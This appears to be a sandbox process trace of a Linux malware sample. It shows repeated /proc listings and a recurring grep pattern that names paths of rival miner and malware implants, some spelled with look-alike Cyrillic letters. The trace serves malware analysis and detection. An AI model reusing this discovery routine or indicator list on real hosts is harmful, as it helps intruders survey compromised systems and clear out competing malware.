/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1235
-
-
/bin/grepgrep exe2⤵PID:1238
-
-
/bin/lsls -latrh /proc/kallsyms2⤵PID:1237
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1240
-
-
/bin/grepgrep exe2⤵PID:1243
-
-
/bin/lsls -latrh /proc/kcore2⤵PID:1242
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1245
-
-
/bin/grepgrep exe2⤵PID:1248
-
-
/bin/lsls -latrh /proc/keys2⤵PID:1247
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1250
-
-
/bin/grepgrep exe2⤵PID:1253
-
-
/bin/lsls -latrh /proc/key-users2⤵PID:1252
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1255
-
-
/bin/grepgrep exe2⤵PID:1258
-
-
/bin/lsls -latrh /proc/kmsg2⤵PID:1257
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1260
-
-
/bin/grepgrep exe2⤵PID:1263
-
-
/bin/lsls -latrh /proc/kpagecgroup2⤵PID:1262
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1265
-
-
/bin/grepgrep exe2⤵PID:1268
-
-
/bin/lsls -latrh /proc/kpagecount2⤵PID:1267
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1270
-
-
/bin/grepgrep exe2⤵PID:1273
-
-
/bin/lsls -latrh /proc/kpageflags2⤵PID:1272
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1275
-
-
/bin/grepgrep exe2⤵PID:1278
-
-
/bin/lsls -latrh /proc/loadavg2⤵PID:1277
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1280
-
-
/bin/grepgrep exe2⤵PID:1283
-
-
/bin/lsls -latrh /proc/locks2⤵PID:1282
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1287
-
-
/bin/grepgrep exe2⤵PID:1290
-
-
/bin/lsls -latrh /proc/meminfo2⤵PID:1289
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1293
-
-
/bin/grepgrep exe2⤵PID:1297
-
-
/bin/lsls -latrh /proc/misc2⤵PID:1296
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1299
-
-
/bin/grepgrep exe2⤵PID:1303
-
-
/bin/lsls -latrh /proc/modules2⤵PID:1302
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1306
-
-
/bin/grepgrep exe2⤵PID:1309
-
-
/bin/lsls -latrh /proc/mounts2⤵PID:1308
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1312
-
-
/bin/lsls -latrh /proc/net2⤵PID:1315
-
-
/bin/grepgrep exe2⤵PID:1316
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1318
-
-
/bin/grepgrep exe2⤵PID:1322
-
-
/bin/lsls -latrh /proc/pagetypeinfo2⤵PID:1321
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1325
-
-
/bin/grepgrep exe2⤵PID:1329
-
-
/bin/lsls -latrh /proc/partitions2⤵PID:1328
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1332
-
-
/bin/grepgrep exe2⤵PID:1335
-
-
/bin/lsls -latrh /proc/sched_debug2⤵PID:1334
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1338
-
-
/bin/grepgrep exe2⤵PID:1342
-
-
/bin/lsls -latrh /proc/schedstat2⤵PID:1341
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1345
-
-
/bin/grepgrep exe2⤵PID:1348
-
-
/bin/lsls -latrh /proc/self2⤵PID:1347
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1351
-
-
/bin/grepgrep exe2⤵PID:1355
-
-
/bin/lsls -latrh /proc/slabinfo2⤵PID:1354
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1358
-
-
/bin/lsls -latrh /proc/softirqs2⤵PID:1360
-
-
/bin/grepgrep exe2⤵PID:1361
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1364
-
-
/bin/grepgrep exe2⤵PID:1368
-
-
/bin/lsls -latrh /proc/stat2⤵PID:1367
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1370
-
-
/bin/grepgrep exe2⤵PID:1374
-
-
/bin/lsls -latrh /proc/swaps2⤵PID:1373
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1377
-
-
/bin/grepgrep exe2⤵PID:1380
-
-
/bin/lsls -latrh /proc/sys2⤵PID:1379
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1383
-
-
/bin/lsls -latrh /proc/sysrq-trigger2⤵PID:1386
-
-
/bin/grepgrep exe2⤵PID:1387
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1389
-
-
/bin/grepgrep exe2⤵PID:1393
-
-
/bin/lsls -latrh /proc/sysvipc2⤵
- System Network Configuration Discovery
PID:1392
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1396
-
-
/bin/grepgrep exe2⤵PID:1399
-
-
/bin/lsls -latrh /proc/thread-self2⤵PID:1398
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1402
-
-
/bin/grepgrep exe2⤵PID:1406
-
-
/bin/lsls -latrh /proc/timer_list2⤵PID:1405
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1408
-
-
/bin/grepgrep exe2⤵PID:1412
-
-
/bin/lsls -latrh /proc/tty2⤵PID:1411
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1415
-
-
/bin/grepgrep exe2⤵PID:1418
-
-
/bin/lsls -latrh /proc/uptime2⤵PID:1417
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1420
-
-
/bin/grepgrep exe2⤵PID:1423
-
-
/bin/lsls -latrh /proc/version2⤵PID:1422
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1425
-
-
/bin/grepgrep exe2⤵PID:1428
-
-
/bin/lsls -latrh /proc/vmallocinfo2⤵PID:1427
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1430
-
-
/bin/grepgrep exe2⤵PID:1433
-
-
/bin/lsls -latrh /proc/vmstat2⤵PID:1432
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1435
-
-
/bin/grepgrep exe2⤵PID:1438
-
-
/bin/lsls -latrh /proc/zoneinfo2⤵PID:1437
-
-
